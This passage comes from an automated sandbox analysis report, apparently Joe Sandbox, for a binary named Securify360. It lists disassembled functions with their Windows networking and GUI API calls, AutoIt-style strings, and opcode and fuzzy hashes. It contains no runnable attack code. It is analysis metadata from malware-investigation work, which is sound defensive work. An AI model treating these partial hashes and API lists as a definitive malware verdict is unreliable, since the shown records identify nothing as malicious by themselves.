                                                                                              • Opcode Fuzzy Hash: 7ad30e7d8bd6f44d9c82c57f767d37a2782e667a8ca4817c6a52b4510a08cc7f
                                                                                              • Instruction Fuzzy Hash: 13913771600241EFDB24CF65C884B6ABBE5FF49710F20856DF94ACB291DB71E841DB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • __wcsnicmp.LIBCMT ref: 00FFB670
                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FFB739
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3222508074-1350329615
                                                                                              • Opcode ID: 065509d80c86e2f418b9b103bff0060fa6b95edd1b870206e07dbfb2bb8279f2
                                                                                              • Instruction ID: a5c24995d4abe67925599fcd86d34452a01b08bde4e15483037bc5b92687f4bf
                                                                                              • Opcode Fuzzy Hash: 065509d80c86e2f418b9b103bff0060fa6b95edd1b870206e07dbfb2bb8279f2
                                                                                              • Instruction Fuzzy Hash: B9619476E00219AFDB14EF54C891EBEB7B4EF48310F108059F546AB361D774AE41EB50
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00F9E01E
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F9E037
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: aefb29b615f67fba41e35d44d31d82d1fbdc2a94bfc72b143e557c5a371df467
                                                                                              • Instruction ID: ff9a7e437e200d67e3d3ca31634292f0b51f1aaab0ea09c389e08d2c63ab75f7
                                                                                              • Opcode Fuzzy Hash: aefb29b615f67fba41e35d44d31d82d1fbdc2a94bfc72b143e557c5a371df467
                                                                                              • Instruction Fuzzy Hash: F3516871408744ABE320AF50EC86FAFBBF8FB94318F51484DF1D8410A5DB75A42ADB56
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 01018186
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0101819B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 1406a47310d3081f63410ff2ad3cca279aefb10a8fb0353de8948e3f75af0e48
                                                                                              • Instruction ID: bfb9b74da776073510cf88d315ab70e94f4fb23b6c628c1314140dabecb8942b
                                                                                              • Opcode Fuzzy Hash: 1406a47310d3081f63410ff2ad3cca279aefb10a8fb0353de8948e3f75af0e48
                                                                                              • Instruction Fuzzy Hash: 68411B75A013099FDB54CF68C881BDA7BF9FB09300F10456AED44AB346D775AA41CF90
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 01002C6A
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 01002CA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_memset
                                                                                              • String ID: |
                                                                                              • API String ID: 1413715105-2343686810
                                                                                              • Opcode ID: e42631878bfb2560dd965376e46a07ce2caa28391ba1da38fe8c6c08029d3588
                                                                                              • Instruction ID: 0e2c23f982db87342c86158c54f29e4b6f67ad28b8f3d0593a7678f235b4c1c5
                                                                                              • Opcode Fuzzy Hash: e42631878bfb2560dd965376e46a07ce2caa28391ba1da38fe8c6c08029d3588
                                                                                              • Instruction Fuzzy Hash: F8313C71C00219ABDF11EFA5CC85AEEBFB9FF05350F00005AF915A6162EB355916DBA0
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0101713C
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01017178
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: ea07f8905a5c0c17ac77696fd7219a71863359dc45e4cff3587b94cda0e3557d
                                                                                              • Instruction ID: e0d669b9ec9506a718feeaba06e5f300bb2c24e0969d4e9a10d9cd6cc17d3c2a
                                                                                              • Opcode Fuzzy Hash: ea07f8905a5c0c17ac77696fd7219a71863359dc45e4cff3587b94cda0e3557d
                                                                                              • Instruction Fuzzy Hash: EE317E75100604AAEB219F78CC80AFB77AAFF48724F109619F9D587195DB39A881D760
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FF30B8
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FF30F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: 85fcef8df20f62248e2e7b30bafe98172081e76c90606f3bb3b439c8ba12888e
                                                                                              • Instruction ID: e97ff8a201e4a6fb2d25aec5246dc4619410d20495af7a24c2f89bc9fde76498
                                                                                              • Opcode Fuzzy Hash: 85fcef8df20f62248e2e7b30bafe98172081e76c90606f3bb3b439c8ba12888e
                                                                                              • Instruction Fuzzy Hash: 2E31A531E0030D9BEB249E59C885BBEBBB9EF06360F144019EE85A61B1D7709B44EB50
                                                                                              APIs
                                                                                              • __snwprintf.LIBCMT ref: 01004132
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __snwprintf_memmove
                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                              • API String ID: 3506404897-2584243854
                                                                                              • Opcode ID: b9f36733944aa75172372b30ae721d69cea83b0132cd184fd39cd4b6c25f5e7d
                                                                                              • Instruction ID: bfb81cccf76f5ef3bf86b0114a39ba04d681c7764785b9b71e4983e50995cd65
                                                                                              • Opcode Fuzzy Hash: b9f36733944aa75172372b30ae721d69cea83b0132cd184fd39cd4b6c25f5e7d
                                                                                              • Instruction Fuzzy Hash: DB219174B00218ABDF11EE65CC81AEE77B5BB55340F000468FA45EB181DB34E905DBA5
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01016D86
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01016D91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 6c87a92525bef81f45bab2f64841773dd163210bfb4feac26d6303be0007e61c
                                                                                              • Instruction ID: 093a0a089988a74cecae3c0aeeeff6ee04c2b91b033b4c77b6ff7f31f1deee75
                                                                                              • Opcode Fuzzy Hash: 6c87a92525bef81f45bab2f64841773dd163210bfb4feac26d6303be0007e61c
                                                                                              • Instruction Fuzzy Hash: 3811C8717002087FEF629E58DC80EFB3BAAEB84364F514129F9549B295D67A9C908760
                                                                                              APIs
                                                                                                • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                                                                • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                                                                • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 01017296
                                                                                              • GetSysColor.USER32(00000012), ref: 010172B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 1a24da76d7293f4112788796b27c2d0910fb928a473a6a51dd072ee5c7713639
                                                                                              • Instruction ID: fa0e5b08181273ee4e611ad600fd9c983267f7dbeffeaa18a945a30fe2463a76
                                                                                              • Opcode Fuzzy Hash: 1a24da76d7293f4112788796b27c2d0910fb928a473a6a51dd072ee5c7713639
                                                                                              • Instruction Fuzzy Hash: B621147261020AAFDB15DFA8CC45AFABBE8EB08314F104658FD95D3245E639A8919B60
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 01016FC7
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01016FD6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: 3cb9e85c9f069e142f011ad417f9387abc7f19e08bbe13ff15475dd973ad42f6
                                                                                              • Instruction ID: b37dac6d70260319b4296ee5f42f2d529211779387946c72f1950049e81d6d48
                                                                                              • Opcode Fuzzy Hash: 3cb9e85c9f069e142f011ad417f9387abc7f19e08bbe13ff15475dd973ad42f6
                                                                                              • Instruction Fuzzy Hash: F9118271100209AFEB614E68DC44EFB3BA9EB04364F904758F9A4971D9C7BBDC509760
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FF31C9
                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FF31E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: 62c0155e19fc75652077080db30afec5a182e94522a551b3dca18c884cea2b66
                                                                                              • Instruction ID: 3680f42778ecf8fa446b14a3dfd33d6605bb9c1e90a4066740b7c152078fe77e
                                                                                              • Opcode Fuzzy Hash: 62c0155e19fc75652077080db30afec5a182e94522a551b3dca18c884cea2b66
                                                                                              • Instruction Fuzzy Hash: FE11E931D0021CABDB20DEA8DC45BBE77B8AF05320F140152EA45A7260D774AF05EB91
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 010028F8
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01002921
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: d37899b5967ca802421283d787003aefa6313b5c72c34fc4e2b8b9ec6381c9c7
                                                                                              • Instruction ID: 8139ac25a58be325276428daccd00855a09b10d68e190a434714b7db4a1a36ad
                                                                                              • Opcode Fuzzy Hash: d37899b5967ca802421283d787003aefa6313b5c72c34fc4e2b8b9ec6381c9c7
                                                                                              • Instruction Fuzzy Hash: C011E074502325BAFB668E558C8CEBBFFA8FF05290F10816AF98546080E3705A94DBF0
                                                                                              APIs
                                                                                                • Part of subcall function 010086E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0100849D,?,00000000,?,?), ref: 010086F7
                                                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 010084DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 2496851823-2422070025
                                                                                              • Opcode ID: c660e4afc49f516085a7559b731fae640758dc3da6b33ab8e326a0a353f3ed52
                                                                                              • Instruction ID: e644fab0c904419062338514661d63d4131b2e8d1097e48e87277917715f3edb
                                                                                              • Opcode Fuzzy Hash: c660e4afc49f516085a7559b731fae640758dc3da6b33ab8e326a0a353f3ed52
                                                                                              • Instruction Fuzzy Hash: 6C11C275900205ABEB21AF64CC42BAEB364FF04320F10856BF955572C1DA71A810D755
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FE9A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 9fab7c9566f30b815ee7b9961bc9b5a85e7f68c1403aba1ecddda6b7433af634
                                                                                              • Instruction ID: 02b5b87c24b8d580e86ea86032b08d57c7cd7aecf423cc97be4506437327ce1e
                                                                                              • Opcode Fuzzy Hash: 9fab7c9566f30b815ee7b9961bc9b5a85e7f68c1403aba1ecddda6b7433af634
                                                                                              • Instruction Fuzzy Hash: B50128B5A45225AB8B24EFA5CC51DFE7369FF56320F100629F8B2572C1DF385808A660
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: 96145da612741d0fe5e924f8ee9650ac0fa308a07113c2847d745a1a5326b420
                                                                                              • Instruction ID: 17760e4e61898555c2e46cb1d740c41d506a56a5c89666e48cfda42836bc38bb
                                                                                              • Opcode Fuzzy Hash: 96145da612741d0fe5e924f8ee9650ac0fa308a07113c2847d745a1a5326b420
                                                                                              • Instruction Fuzzy Hash: 1501F9728042587EDB28C6A9CC56FFE7BFC9F01301F00419EF552D6181E5B9E6089B60
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FE9923
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 674d8950d121c7bb998014c2553d1aeb434d5262b009d3c90bd2b47310710feb
                                                                                              • Instruction ID: 15b9b2d6e956af9260ef67dc75e7719af4ab1a30a817136e52aa28567f968a6c
                                                                                              • Opcode Fuzzy Hash: 674d8950d121c7bb998014c2553d1aeb434d5262b009d3c90bd2b47310710feb
                                                                                              • Instruction Fuzzy Hash: 3801F7F6E81105ABCB24EBA1CD52EFF73A8AF16310F11001DB84263292DA585E08B6F1
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FE99A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 372448540-1403004172
                                                                                              • Opcode ID: 84e2d1ed8a37c1a690d53f55e67e80343c3994908c0cee07ecd1c95c5cbbfe1c
                                                                                              • Instruction ID: 8c977a3d73ab244ee01bd4488ee618162045b90259129ba5a8513d845cd2e28b
